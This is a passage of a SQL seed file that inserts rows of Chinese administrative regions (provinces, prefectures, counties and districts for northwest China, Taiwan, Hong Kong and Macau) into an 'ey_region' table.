INSERT INTO `ey_region` VALUES ('44679', '镇原县', '3', '44569', 'Z');
INSERT INTO `ey_region` VALUES ('44699', '定西市', '2', '43776', 'D');
INSERT INTO `ey_region` VALUES ('44700', '市辖区', '3', '44699', 'S');
INSERT INTO `ey_region` VALUES ('44701', '安定区', '3', '44699', 'A');
INSERT INTO `ey_region` VALUES ('44723', '通渭县', '3', '44699', 'T');
INSERT INTO `ey_region` VALUES ('44742', '陇西县', '3', '44699', 'L');
INSERT INTO `ey_region` VALUES ('44760', '渭源县', '3', '44699', 'W');
INSERT INTO `ey_region` VALUES ('44777', '临洮县', '3', '44699', 'L');
INSERT INTO `ey_region` VALUES ('44796', '漳县', '3', '44699', 'Z');
INSERT INTO `ey_region` VALUES ('44810', '岷县', '3', '44699', 'M');
INSERT INTO `ey_region` VALUES ('44829', '陇南市', '2', '43776', 'L');
INSERT INTO `ey_region` VALUES ('44830', '市辖区', '3', '44829', 'S');
INSERT INTO `ey_region` VALUES ('44831', '武都区', '3', '44829', 'W');
INSERT INTO `ey_region` VALUES ('44868', '成县', '3', '44829', 'C');
INSERT INTO `ey_region` VALUES ('44886', '文县', '3', '44829', 'W');
INSERT INTO `ey_region` VALUES ('44907', '宕昌县', '3', '44829', 'D');
INSERT INTO `ey_region` VALUES ('44933', '康县', '3', '44829', 'K');
INSERT INTO `ey_region` VALUES ('44955', '西和县', '3', '44829', 'X');
INSERT INTO `ey_region` VALUES ('44976', '礼县', '3', '44829', 'L');
INSERT INTO `ey_region` VALUES ('45006', '徽县', '3', '44829', 'H');
INSERT INTO `ey_region` VALUES ('45022', '两当县', '3', '44829', 'L');
INSERT INTO `ey_region` VALUES ('45035', '临夏州', '2', '43776', 'L');
INSERT INTO `ey_region` VALUES ('45036', '临夏市', '3', '45035', 'L');
INSERT INTO `ey_region` VALUES ('45047', '临夏县', '3', '45035', 'L');
INSERT INTO `ey_region` VALUES ('45073', '康乐县', '3', '45035', 'K');
INSERT INTO `ey_region` VALUES ('45089', '永靖县', '3', '45035', 'Y');
INSERT INTO `ey_region` VALUES ('45107', '广河县', '3', '45035', 'G');
INSERT INTO `ey_region` VALUES ('45117', '和政县', '3', '45035', 'H');
INSERT INTO `ey_region` VALUES ('45131', '东乡县', '3', '45035', 'D');
INSERT INTO `ey_region` VALUES ('45156', '积石山县', '3', '45035', 'J');
INSERT INTO `ey_region` VALUES ('45174', '甘南州', '2', '43776', 'G');
INSERT INTO `ey_region` VALUES ('45175', '合作市', '3', '45174', 'H');
INSERT INTO `ey_region` VALUES ('45186', '临潭县', '3', '45174', 'L');
INSERT INTO `ey_region` VALUES ('45203', '卓尼县', '3', '45174', 'Z');
INSERT INTO `ey_region` VALUES ('45219', '舟曲县', '3', '45174', 'Z');
INSERT INTO `ey_region` VALUES ('45239', '迭部县', '3', '45174', 'D');
INSERT INTO `ey_region` VALUES ('45251', '玛曲县', '3', '45174', 'M');
INSERT INTO `ey_region` VALUES ('45263', '碌曲县', '3', '45174', 'L');
INSERT INTO `ey_region` VALUES ('45272', '夏河县', '3', '45174', 'X');
INSERT INTO `ey_region` VALUES ('45286', '青海省', '1', '0', 'Q');
INSERT INTO `ey_region` VALUES ('45287', '西宁市', '2', '45286', 'X');
INSERT INTO `ey_region` VALUES ('45288', '市辖区', '3', '45287', 'S');
INSERT INTO `ey_region` VALUES ('45289', '城东区', '3', '45287', 'C');
INSERT INTO `ey_region` VALUES ('45299', '城中区', '3', '45287', 'C');
INSERT INTO `ey_region` VALUES ('45306', '城西区', '3', '45287', 'C');
INSERT INTO `ey_region` VALUES ('45314', '城北区', '3', '45287', 'C');
INSERT INTO `ey_region` VALUES ('45320', '大通县', '3', '45287', 'D');
INSERT INTO `ey_region` VALUES ('45341', '湟中县', '3', '45287', 'H');
INSERT INTO `ey_region` VALUES ('45358', '湟源县', '3', '45287', 'H');
INSERT INTO `ey_region` VALUES ('45368', '海东地区', '2', '45286', 'H');
INSERT INTO `ey_region` VALUES ('45369', '平安县', '3', '45368', 'P');
INSERT INTO `ey_region` VALUES ('45378', '民和县', '3', '45368', 'M');
INSERT INTO `ey_region` VALUES ('45401', '乐都县', '3', '45368', 'L');
INSERT INTO `ey_region` VALUES ('45421', '互助县', '3', '45368', 'H');
INSERT INTO `ey_region` VALUES ('45441', '化隆县', '3', '45368', 'H');
INSERT INTO `ey_region` VALUES ('45461', '循化县', '3', '45368', 'X');
INSERT INTO `ey_region` VALUES ('45471', '海北州', '2', '45286', 'H');
INSERT INTO `ey_region` VALUES ('45472', '门源县', '3', '45471', 'M');
INSERT INTO `ey_region` VALUES ('45487', '祁连县', '3', '45471', 'Q');
INSERT INTO `ey_region` VALUES ('45495', '海晏县', '3', '45471', 'H');
INSERT INTO `ey_region` VALUES ('45502', '刚察县', '3', '45471', 'G');
INSERT INTO `ey_region` VALUES ('45510', '黄南州', '2', '45286', 'H');
INSERT INTO `ey_region` VALUES ('45511', '同仁县', '3', '45510', 'T');
INSERT INTO `ey_region` VALUES ('45523', '尖扎县', '3', '45510', 'J');
INSERT INTO `ey_region` VALUES ('45533', '泽库县', '3', '45510', 'Z');
INSERT INTO `ey_region` VALUES ('45542', '河南县', '3', '45510', 'H');
INSERT INTO `ey_region` VALUES ('45548', '海南州', '2', '45286', 'H');
INSERT INTO `ey_region` VALUES ('45549', '共和县', '3', '45548', 'G');
INSERT INTO `ey_region` VALUES ('45566', '同德县', '3', '45548', 'T');
INSERT INTO `ey_region` VALUES ('45573', '贵德县', '3', '45548', 'G');
INSERT INTO `ey_region` VALUES ('45581', '兴海县', '3', '45548', 'X');
INSERT INTO `ey_region` VALUES ('45589', '贵南县', '3', '45548', 'G');
INSERT INTO `ey_region` VALUES ('45597', '果洛州', '2', '45286', 'G');
INSERT INTO `ey_region` VALUES ('45598', '玛沁县', '3', '45597', 'M');
INSERT INTO `ey_region` VALUES ('45607', '班玛县', '3', '45597', 'B');
INSERT INTO `ey_region` VALUES ('45617', '甘德县', '3', '45597', 'G');
INSERT INTO `ey_region` VALUES ('45625', '达日县', '3', '45597', 'D');
INSERT INTO `ey_region` VALUES ('45636', '久治县', '3', '45597', 'J');
INSERT INTO `ey_region` VALUES ('45643', '玛多县', '3', '45597', 'M');
INSERT INTO `ey_region` VALUES ('45648', '玉树州', '2', '45286', 'Y');
INSERT INTO `ey_region` VALUES ('45649', '玉树县', '3', '45648', 'Y');
INSERT INTO `ey_region` VALUES ('45659', '杂多县', '3', '45648', 'Z');
INSERT INTO `ey_region` VALUES ('45668', '称多县', '3', '45648', 'C');
INSERT INTO `ey_region` VALUES ('45676', '治多县', '3', '45648', 'Z');
INSERT INTO `ey_region` VALUES ('45683', '囊谦县', '3', '45648', 'N');
INSERT INTO `ey_region` VALUES ('45694', '曲麻莱县', '3', '45648', 'Q');
INSERT INTO `ey_region` VALUES ('45701', '海西州', '2', '45286', 'H');
INSERT INTO `ey_region` VALUES ('45702', '格尔木市', '3', '45701', 'G');
INSERT INTO `ey_region` VALUES ('45714', '德令哈市', '3', '45701', 'D');
INSERT INTO `ey_region` VALUES ('45727', '乌兰县', '3', '45701', 'W');
INSERT INTO `ey_region` VALUES ('45733', '都兰县', '3', '45701', 'D');
INSERT INTO `ey_region` VALUES ('45742', '天峻县', '3', '45701', 'T');
INSERT INTO `ey_region` VALUES ('45753', '宁夏回族自治区', '1', '0', 'N');
INSERT INTO `ey_region` VALUES ('45754', '银川市', '2', '45753', 'Y');
INSERT INTO `ey_region` VALUES ('45755', '市辖区', '3', '45754', 'S');
INSERT INTO `ey_region` VALUES ('45756', '兴庆区', '3', '45754', 'X');
INSERT INTO `ey_region` VALUES ('45772', '西夏区', '3', '45754', 'X');
INSERT INTO `ey_region` VALUES ('45784', '金凤区', '3', '45754', 'J');
INSERT INTO `ey_region` VALUES ('45794', '永宁县', '3', '45754', 'Y');
INSERT INTO `ey_region` VALUES ('45803', '贺兰县', '3', '45754', 'H');
INSERT INTO `ey_region` VALUES ('45813', '灵武市', '3', '45754', 'L');
INSERT INTO `ey_region` VALUES ('45825', '石嘴山市', '2', '45753', 'S');
INSERT INTO `ey_region` VALUES ('45826', '市辖区', '3', '45825', 'S');
INSERT INTO `ey_region` VALUES ('45827', '大武口区', '3', '45825', 'D');
INSERT INTO `ey_region` VALUES ('45839', '惠农区', '3', '45825', 'H');
INSERT INTO `ey_region` VALUES ('45856', '平罗县', '3', '45825', 'P');
INSERT INTO `ey_region` VALUES ('45871', '吴忠市', '2', '45753', 'W');
INSERT INTO `ey_region` VALUES ('45872', '市辖区', '3', '45871', 'S');
INSERT INTO `ey_region` VALUES ('45877', '利通区', '3', '45871', 'L');
INSERT INTO `ey_region` VALUES ('45892', '盐池县', '3', '45871', 'Y');
INSERT INTO `ey_region` VALUES ('45903', '同心县', '3', '45871', 'T');
INSERT INTO `ey_region` VALUES ('45914', '青铜峡市', '3', '45871', 'Q');
INSERT INTO `ey_region` VALUES ('45926', '固原市', '2', '45753', 'G');
INSERT INTO `ey_region` VALUES ('45927', '市辖区', '3', '45926', 'S');
INSERT INTO `ey_region` VALUES ('45928', '原州区', '3', '45926', 'Y');
INSERT INTO `ey_region` VALUES ('45944', '西吉县', '3', '45926', 'X');
INSERT INTO `ey_region` VALUES ('45964', '隆德县', '3', '45926', 'L');
INSERT INTO `ey_region` VALUES ('45978', '泾源县', '3', '45926', 'J');
INSERT INTO `ey_region` VALUES ('45986', '彭阳县', '3', '45926', 'P');
INSERT INTO `ey_region` VALUES ('45999', '中卫市', '2', '45753', 'Z');
INSERT INTO `ey_region` VALUES ('46000', '市辖区', '3', '45999', 'S');
INSERT INTO `ey_region` VALUES ('46012', '沙坡头区', '3', '45999', 'S');
INSERT INTO `ey_region` VALUES ('46013', '中宁县', '3', '45999', 'Z');
INSERT INTO `ey_region` VALUES ('46026', '海原县', '3', '45999', 'H');
INSERT INTO `ey_region` VALUES ('46047', '新疆维吾尔自治区', '1', '0', 'X');
INSERT INTO `ey_region` VALUES ('46048', '乌鲁木齐市', '2', '46047', 'W');
INSERT INTO `ey_region` VALUES ('46049', '市辖区', '3', '46048', 'S');
INSERT INTO `ey_region` VALUES ('46050', '天山区', '3', '46048', 'T');
INSERT INTO `ey_region` VALUES ('46065', '沙依巴克区', '3', '46048', 'S');
INSERT INTO `ey_region` VALUES ('46079', '新市区', '3', '46048', 'X');
INSERT INTO `ey_region` VALUES ('46095', '水磨沟区', '3', '46048', 'S');
INSERT INTO `ey_region` VALUES ('46104', '头屯河区', '3', '46048', 'T');
INSERT INTO `ey_region` VALUES ('46114', '达坂城区', '3', '46048', 'D');
INSERT INTO `ey_region` VALUES ('46123', '东山区', '3', '46048', 'D');
INSERT INTO `ey_region` VALUES ('46128', '乌鲁木齐县', '3', '46048', 'W');
INSERT INTO `ey_region` VALUES ('46138', '克拉玛依市', '2', '46047', 'K');
INSERT INTO `ey_region` VALUES ('46139', '市辖区', '3', '46138', 'S');
INSERT INTO `ey_region` VALUES ('46140', '独山子区', '3', '46138', 'D');
INSERT INTO `ey_region` VALUES ('46144', '克拉玛依区', '3', '46138', 'K');
INSERT INTO `ey_region` VALUES ('46155', '白碱滩区', '3', '46138', 'B');
INSERT INTO `ey_region` VALUES ('46158', '乌尔禾区', '3', '46138', 'W');
INSERT INTO `ey_region` VALUES ('46162', '吐鲁番地区', '2', '46047', 'T');
INSERT INTO `ey_region` VALUES ('46163', '吐鲁番市', '3', '46162', 'T');
INSERT INTO `ey_region` VALUES ('46178', '鄯善县', '3', '46162', 'S');
INSERT INTO `ey_region` VALUES ('46189', '托克逊县', '3', '46162', 'T');
INSERT INTO `ey_region` VALUES ('46197', '哈密地区', '2', '46047', 'H');
INSERT INTO `ey_region` VALUES ('46198', '哈密市', '3', '46197', 'H');
INSERT INTO `ey_region` VALUES ('46230', '巴里坤县', '3', '46197', 'B');
INSERT INTO `ey_region` VALUES ('46246', '伊吾县', '3', '46197', 'Y');
INSERT INTO `ey_region` VALUES ('46255', '昌吉州', '2', '46047', 'C');
INSERT INTO `ey_region` VALUES ('46256', '昌吉市', '3', '46255', 'C');
INSERT INTO `ey_region` VALUES ('46275', '阜康市', '3', '46255', 'F');
INSERT INTO `ey_region` VALUES ('46289', '米泉市', '3', '46255', 'M');
INSERT INTO `ey_region` VALUES ('46299', '呼图壁县', '3', '46255', 'H');
INSERT INTO `ey_region` VALUES ('46316', '玛纳斯', '3', '46255', 'M');
INSERT INTO `ey_region` VALUES ('46337', '奇台县', '3', '46255', 'Q');
INSERT INTO `ey_region` VALUES ('46355', '吉木萨尔县', '3', '46255', 'J');
INSERT INTO `ey_region` VALUES ('46366', '木垒县', '3', '46255', 'M');
INSERT INTO `ey_region` VALUES ('46380', '博州', '2', '46047', 'B');
INSERT INTO `ey_region` VALUES ('46381', '博乐市', '3', '46380', 'B');
INSERT INTO `ey_region` VALUES ('46399', '精河县', '3', '46380', 'J');
INSERT INTO `ey_region` VALUES ('46410', '温泉县', '3', '46380', 'W');
INSERT INTO `ey_region` VALUES ('46422', '巴州', '2', '46047', 'B');
INSERT INTO `ey_region` VALUES ('46423', '库尔勒市', '3', '46422', 'K');
INSERT INTO `ey_region` VALUES ('46451', '轮台县', '3', '46422', 'L');
INSERT INTO `ey_region` VALUES ('46463', '尉犁县', '3', '46422', 'W');
INSERT INTO `ey_region` VALUES ('46476', '若羌县', '3', '46422', 'R');
INSERT INTO `ey_region` VALUES ('46486', '且末县', '3', '46422', 'Q');
INSERT INTO `ey_region` VALUES ('46500', '焉耆县', '3', '46422', 'Y');
INSERT INTO `ey_region` VALUES ('46512', '和静县', '3', '46422', 'H');
INSERT INTO `ey_region` VALUES ('46531', '和硕县', '3', '46422', 'H');
INSERT INTO `ey_region` VALUES ('46542', '博湖县', '3', '46422', 'B');
INSERT INTO `ey_region` VALUES ('46551', '阿克苏地区', '2', '46047', 'A');
INSERT INTO `ey_region` VALUES ('46552', '阿克苏市', '3', '46551', 'A');
INSERT INTO `ey_region` VALUES ('46571', '温宿县', '3', '46551', 'W');
INSERT INTO `ey_region` VALUES ('46592', '库车县', '3', '46551', 'K');
INSERT INTO `ey_region` VALUES ('46617', '沙雅县', '3', '46551', 'S');
INSERT INTO `ey_region` VALUES ('46630', '新和县', '3', '46551', 'X');
INSERT INTO `ey_region` VALUES ('46640', '拜城县', '3', '46551', 'B');
INSERT INTO `ey_region` VALUES ('46657', '乌什县', '3', '46551', 'W');
INSERT INTO `ey_region` VALUES ('46668', '阿瓦提县', '3', '46551', 'A');
INSERT INTO `ey_region` VALUES ('46682', '柯坪县', '3', '46551', 'K');
INSERT INTO `ey_region` VALUES ('46688', '克州', '2', '46047', 'K');
INSERT INTO `ey_region` VALUES ('46689', '阿图什市', '3', '46688', 'A');
INSERT INTO `ey_region` VALUES ('46704', '阿克陶县', '3', '46688', 'A');
INSERT INTO `ey_region` VALUES ('46723', '阿合奇县', '3', '46688', 'A');
INSERT INTO `ey_region` VALUES ('46733', '乌恰县', '3', '46688', 'W');
INSERT INTO `ey_region` VALUES ('46747', '喀什地区', '2', '46047', 'K');
INSERT INTO `ey_region` VALUES ('46748', '喀什市', '3', '46747', 'K');
INSERT INTO `ey_region` VALUES ('46761', '疏附县', '3', '46747', 'S');
INSERT INTO `ey_region` VALUES ('46780', '疏勒县', '3', '46747', 'S');
INSERT INTO `ey_region` VALUES ('46797', '英吉沙县', '3', '46747', 'Y');
INSERT INTO `ey_region` VALUES ('46813', '泽普县', '3', '46747', 'Z');
INSERT INTO `ey_region` VALUES ('46830', '莎车县', '3', '46747', 'S');
INSERT INTO `ey_region` VALUES ('46863', '叶城县', '3', '46747', 'Y');
INSERT INTO `ey_region` VALUES ('46885', '麦盖提县', '3', '46747', 'M');
INSERT INTO `ey_region` VALUES ('46902', '岳普湖县', '3', '46747', 'Y');
INSERT INTO `ey_region` VALUES ('46913', '伽师县', '3', '46747', 'Q');
INSERT INTO `ey_region` VALUES ('46928', '巴楚县', '3', '46747', 'B');
INSERT INTO `ey_region` VALUES ('46942', '塔什库尔干县', '3', '46747', 'T');
INSERT INTO `ey_region` VALUES ('46957', '和田地区', '2', '46047', 'H');
INSERT INTO `ey_region` VALUES ('46958', '和田市', '3', '46957', 'H');
INSERT INTO `ey_region` VALUES ('46971', '和田县', '3', '46957', 'H');
INSERT INTO `ey_region` VALUES ('46983', '墨玉县', '3', '46957', 'M');
INSERT INTO `ey_region` VALUES ('47002', '皮山县', '3', '46957', 'P');
INSERT INTO `ey_region` VALUES ('47020', '洛浦县', '3', '46957', 'L');
INSERT INTO `ey_region` VALUES ('47032', '策勒县', '3', '46957', 'C');
INSERT INTO `ey_region` VALUES ('47042', '于田县', '3', '46957', 'Y');
INSERT INTO `ey_region` VALUES ('47061', '民丰县', '3', '46957', 'M');
INSERT INTO `ey_region` VALUES ('47069', '伊犁州', '2', '46047', 'Y');
INSERT INTO `ey_region` VALUES ('47070', '伊宁市', '3', '47069', 'Y');
INSERT INTO `ey_region` VALUES ('47091', '奎屯市', '3', '47069', 'K');
INSERT INTO `ey_region` VALUES ('47099', '伊宁县', '3', '47069', 'Y');
INSERT INTO `ey_region` VALUES ('47121', '察布查尔县', '3', '47069', 'C');
INSERT INTO `ey_region` VALUES ('47143', '霍城县', '3', '47069', 'H');
INSERT INTO `ey_region` VALUES ('47164', '巩留县', '3', '47069', 'G');
INSERT INTO `ey_region` VALUES ('47180', '新源县', '3', '47069', 'X');
INSERT INTO `ey_region` VALUES ('47196', '昭苏县', '3', '47069', 'Z');
INSERT INTO `ey_region` VALUES ('47214', '特克斯县', '3', '47069', 'T');
INSERT INTO `ey_region` VALUES ('47226', '尼勒克县', '3', '47069', 'N');
INSERT INTO `ey_region` VALUES ('47241', '塔城地区', '2', '46047', 'T');
INSERT INTO `ey_region` VALUES ('47242', '塔城市', '3', '47241', 'T');
INSERT INTO `ey_region` VALUES ('47258', '乌苏市', '3', '47241', 'W');
INSERT INTO `ey_region` VALUES ('47291', '额敏县', '3', '47241', 'E');
INSERT INTO `ey_region` VALUES ('47315', '沙湾县', '3', '47241', 'S');
INSERT INTO `ey_region` VALUES ('47338', '托里县', '3', '47241', 'T');
INSERT INTO `ey_region` VALUES ('47351', '裕民县', '3', '47241', 'Y');
INSERT INTO `ey_region` VALUES ('47360', '和布县', '3', '47241', 'H');
INSERT INTO `ey_region` VALUES ('47374', '阿勒泰地区', '2', '46047', 'A');
INSERT INTO `ey_region` VALUES ('47375', '阿勒泰市', '3', '47374', 'A');
INSERT INTO `ey_region` VALUES ('47393', '布尔津县', '3', '47374', 'B');
INSERT INTO `ey_region` VALUES ('47401', '富蕴县', '3', '47374', 'F');
INSERT INTO `ey_region` VALUES ('47411', '福海县', '3', '47374', 'F');
INSERT INTO `ey_region` VALUES ('47424', '哈巴河县', '3', '47374', 'H');
INSERT INTO `ey_region` VALUES ('47433', '青河县', '3', '47374', 'Q');
INSERT INTO `ey_region` VALUES ('47441', '吉木乃县', '3', '47374', 'J');
INSERT INTO `ey_region` VALUES ('47450', '省直辖行政单位', '2', '46047', 'S');
INSERT INTO `ey_region` VALUES ('47451', '石河子市', '3', '47450', 'S');
INSERT INTO `ey_region` VALUES ('47460', '阿拉尔市', '3', '47450', 'A');
INSERT INTO `ey_region` VALUES ('47477', '图木舒克市', '3', '47450', 'T');
INSERT INTO `ey_region` VALUES ('47486', '五家渠市', '3', '47450', 'W');
INSERT INTO `ey_region` VALUES ('47493', '台湾省', '1', '0', 'T');
INSERT INTO `ey_region` VALUES ('47494', '香港特别行政区', '1', '0', 'X');
INSERT INTO `ey_region` VALUES ('47495', '澳门特别行政区', '1', '0', 'A');
INSERT INTO `ey_region` VALUES ('47496', '龙华新区', '3', '28558', 'L');
INSERT INTO `ey_region` VALUES ('47497', '光明新区', '3', '28558', 'G');
INSERT INTO `ey_region` VALUES ('47500', '新界', '2', '47494', 'X');
INSERT INTO `ey_region` VALUES ('47501', '观塘区', '3', '47498', 'G');
INSERT INTO `ey_region` VALUES ('47502', '黄大仙区', '3', '47498', 'H');
INSERT INTO `ey_region` VALUES ('47503', '九龙城区', '3', '47498', 'J');
INSERT INTO `ey_region` VALUES ('47504', '深水埗区', '3', '47498', 'S');
INSERT INTO `ey_region` VALUES ('47505', '油尖旺区', '3', '47498', 'Y');
INSERT INTO `ey_region` VALUES ('47506', '东区', '3', '47499', 'D');
INSERT INTO `ey_region` VALUES ('47507', '南区', '3', '47499', 'N');
INSERT INTO `ey_region` VALUES ('47508', '湾仔', '3', '47499', 'W');
INSERT INTO `ey_region` VALUES ('47509', '中西区', '3', '47499', 'Z');
INSERT INTO `ey_region` VALUES ('47510', '北区', '3', '47500', 'B');
INSERT INTO `ey_region` VALUES ('47511', '大埔区', '3', '47500', 'D');
INSERT INTO `ey_region` VALUES ('47512', '葵青区', '3', '47500', 'K');
INSERT INTO `ey_region` VALUES ('47513', '离岛区', '3', '47500', 'L');
INSERT INTO `ey_region` VALUES ('47514', '荃湾区', '3', '47500', 'Q');
INSERT INTO `ey_region` VALUES ('47515', '沙田区', '3', '47500', 'S');
INSERT INTO `ey_region` VALUES ('47516', '屯门区', '3', '47500', 'T');
INSERT INTO `ey_region` VALUES ('47517', '西贡区', '3', '47500', 'X');
INSERT INTO `ey_region` VALUES ('47518', '元朗区', '3', '47500', 'Y');
INSERT INTO `ey_region` VALUES ('47519', '澳门半岛', '2', '47495', 'A');
INSERT INTO `ey_region` VALUES ('47520', '离岛', '2', '47495', 'L');
INSERT INTO `ey_region` VALUES ('47521', '大堂区', '3', '47519', 'D');
INSERT INTO `ey_region` VALUES ('47522', '风顺堂区', '3', '47519', 'F');
INSERT INTO `ey_region` VALUES ('47523', '花地玛堂区', '3', '47519', 'H');
INSERT INTO `ey_region` VALUES ('47524', '花王堂区', '3', '47519', 'H');
INSERT INTO `ey_region` VALUES ('47525', '望德堂区', '3', '47519', 'W');
INSERT INTO `ey_region` VALUES ('47526', '嘉模堂区', '3', '47520', 'J');
INSERT INTO `ey_region` VALUES ('47527', '路氹填海区', '3', '47520', 'L');
INSERT INTO `ey_region` VALUES ('47528', '圣方济各堂区', '3', '47520', 'S');
INSERT INTO `ey_region` VALUES ('47529', '高雄市', '2', '47493', 'G');
INSERT INTO `ey_region` VALUES ('47530', '花莲县', '2', '47493', 'H');
INSERT INTO `ey_region` VALUES ('47531', '基隆市', '2', '47493', 'J');
INSERT INTO `ey_region` VALUES ('47532', '嘉义市', '2', '47493', 'J');
INSERT INTO `ey_region` VALUES ('47533', '嘉义县', '2', '47493', 'J');
INSERT INTO `ey_region` VALUES ('47534', '金门县', '2', '47493', 'J');
INSERT INTO `ey_region` VALUES ('47535', '连江县', '2', '47493', 'L');
INSERT INTO `ey_region` VALUES ('47536', '苗栗县', '2', '47493', 'M');
INSERT INTO `ey_region` VALUES ('47537', '南投县', '2', '47493', 'N');
INSERT INTO `ey_region` VALUES ('47538', '澎湖县', '2', '47493', 'P');
INSERT INTO `ey_region` VALUES ('47539', '屏东县', '2', '47493', 'P');
INSERT INTO `ey_region` VALUES ('47540', '台北市', '2', '47493', 'T');
INSERT INTO `ey_region` VALUES ('47541', '台东县', '2', '47493', 'T');
INSERT INTO `ey_region` VALUES ('47542', '台南市', '2', '47493', 'T');
INSERT INTO `ey_region` VALUES ('47543', '台中市', '2', '47493', 'T');
INSERT INTO `ey_region` VALUES ('47544', '桃园市', '2', '47493', 'T');
INSERT INTO `ey_region` VALUES ('47545', '新北市', '2', '47493', 'X');
INSERT INTO `ey_region` VALUES ('47546', '新竹市', '2', '47493', 'X');
INSERT INTO `ey_region` VALUES ('47547', '新竹县', '2', '47493', 'X');
INSERT INTO `ey_region` VALUES ('47548', '宜兰县', '2', '47493', 'Y');
INSERT INTO `ey_region` VALUES ('47549', '云林县', '2', '47493', 'Y');
INSERT INTO `ey_region` VALUES ('47550', '彰化县', '2', '47493', 'Z');
INSERT INTO `ey_region` VALUES ('47551', '阿莲区', '3', '47529', 'A');
INSERT INTO `ey_region` VALUES ('47552', '大寮区', '3', '47529', 'D');
INSERT INTO `ey_region` VALUES ('47553', '大社区', '3', '47529', 'D');
INSERT INTO `ey_region` VALUES ('47554', '大树区', '3', '47529', 'D');
INSERT INTO `ey_region` VALUES ('47555', '凤山区', '3', '47529', 'F');
INSERT INTO `ey_region` VALUES ('47556', '冈山区', '3', '47529', 'G');
INSERT INTO `ey_region` VALUES ('47557', '鼓山区', '3', '47529', 'G');
INSERT INTO `ey_region` VALUES ('47558', '湖内区', '3', '47529', 'H');
INSERT INTO `ey_region` VALUES ('47559', '甲仙区', '3', '47529', 'J');
INSERT INTO `ey_region` VALUES ('47560', '林园区', '3', '47529', 'L');
INSERT INTO `ey_region` VALUES ('47561', '苓雅区', '3', '47529', 'L');
INSERT INTO `ey_region` VALUES ('47562', '六龟区', '3', '47529', 'L');
INSERT INTO `ey_region` VALUES ('47563', '路竹区', '3', '47529', 'L');
INSERT INTO `ey_region` VALUES ('47564', '茂林区', '3', '47529', 'M');
INSERT INTO `ey_region` VALUES ('47565', '美浓区', '3', '47529', 'M');
INSERT INTO `ey_region` VALUES ('47566', '弥陀区', '3', '47529', 'M');
INSERT INTO `ey_region` VALUES ('47567', '楠梓区', '3', '47529', 'N');
INSERT INTO `ey_region` VALUES ('47568', '那玛夏区', '3', '47529', 'N');
INSERT INTO `ey_region` VALUES ('47569', '内门区', '3', '47529', 'N');
INSERT INTO `ey_region` VALUES ('47570', '鸟松区', '3', '47529', 'N');
INSERT INTO `ey_region` VALUES ('47571', '旗津区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47572', '旗门区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47573', '其它区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47574', '前金区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47575', '前镇区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47576', '桥头区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47577', '茄萣区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47578', '芩雅区', '3', '47529', 'Q');
INSERT INTO `ey_region` VALUES ('47579', '仁武区', '3', '47529', 'R');
INSERT INTO `ey_region` VALUES ('47580', '三民区', '3', '47529', 'S');
INSERT INTO `ey_region` VALUES ('47581', '杉林区', '3', '47529', 'S');
INSERT INTO `ey_region` VALUES ('47582', '桃源区', '3', '47529', 'T');
INSERT INTO `ey_region` VALUES ('47583', '田寮区', '3', '47529', 'T');
INSERT INTO `ey_region` VALUES ('47584', '小港区', '3', '47529', 'X');
INSERT INTO `ey_region` VALUES ('47585', '新兴区', '3', '47529', 'X');
INSERT INTO `ey_region` VALUES ('47586', '燕巢区', '3', '47529', 'Y');
INSERT INTO `ey_region` VALUES ('47587', '盐埕区', '3', '47529', 'Y');
INSERT INTO `ey_region` VALUES ('47588', '永安区', '3', '47529', 'Y');
INSERT INTO `ey_region` VALUES ('47589', '梓官区', '3', '47529', 'Z');
INSERT INTO `ey_region` VALUES ('47590', '左营区', '3', '47529', 'Z');
INSERT INTO `ey_region` VALUES ('47591', '丰滨乡', '3', '47530', 'F');
INSERT INTO `ey_region` VALUES ('47592', '凤林镇', '3', '47530', 'F');
INSERT INTO `ey_region` VALUES ('47593', '富里乡', '3', '47530', 'F');
INSERT INTO `ey_region` VALUES ('47594', '光复乡', '3', '47530', 'G');
INSERT INTO `ey_region` VALUES ('47595', '花莲市', '3', '47530', 'H');
INSERT INTO `ey_region` VALUES ('47596', '吉安乡', '3', '47530', 'J');
INSERT INTO `ey_region` VALUES ('47597', '瑞穗乡', '3', '47530', 'R');
INSERT INTO `ey_region` VALUES ('47598', '寿丰乡', '3', '47530', 'S');
INSERT INTO `ey_region` VALUES ('47599', '太鲁阁', '3', '47530', 'T');
INSERT INTO `ey_region` VALUES ('47600', '万荣乡', '3', '47530', 'W');
INSERT INTO `ey_region` VALUES ('47601', '新城乡', '3', '47530', 'X');
INSERT INTO `ey_region` VALUES ('47602', '秀林乡', '3', '47530', 'X');
INSERT INTO `ey_region` VALUES ('47603', '玉里镇', '3', '47530', 'Y');
INSERT INTO `ey_region` VALUES ('47604', '卓溪乡', '3', '47530', 'Z');
INSERT INTO `ey_region` VALUES ('47605', '安乐区', '3', '47531', 'A');
INSERT INTO `ey_region` VALUES ('47606', '暖暖区', '3', '47531', 'N');
INSERT INTO `ey_region` VALUES ('47607', '七堵区', '3', '47531', 'Q');
INSERT INTO `ey_region` VALUES ('47608', '其它区', '3', '47531', 'Q');
INSERT INTO `ey_region` VALUES ('47609', '仁爱区', '3', '47531', 'R');
INSERT INTO `ey_region` VALUES ('47610', '信义区', '3', '47531', 'X');
INSERT INTO `ey_region` VALUES ('47611', '中山区', '3', '47531', 'Z');
INSERT INTO `ey_region` VALUES ('47612', '中正区', '3', '47531', 'Z');
INSERT INTO `ey_region` VALUES ('47613', '东区', '3', '47532', 'D');
INSERT INTO `ey_region` VALUES ('47614', '西区', '3', '47532', 'X');
INSERT INTO `ey_region` VALUES ('47615', '其它区', '3', '47532', 'Q');
INSERT INTO `ey_region` VALUES ('47616', '阿里山乡', '3', '47533', 'A');
INSERT INTO `ey_region` VALUES ('47617', '布袋镇', '3', '47533', 'B');
INSERT INTO `ey_region` VALUES ('47618', '大林镇', '3', '47533', 'D');
INSERT INTO `ey_region` VALUES ('47619', '大埔乡', '3', '47533', 'D');
INSERT INTO `ey_region` VALUES ('47620', '东石乡', '3', '47533', 'D');
INSERT INTO `ey_region` VALUES ('47621', '番路乡', '3', '47533', 'F');
INSERT INTO `ey_region` VALUES ('47622', '六脚乡', '3', '47533', 'L');
INSERT INTO `ey_region` VALUES ('47623', '鹿草乡', '3', '47533', 'L');
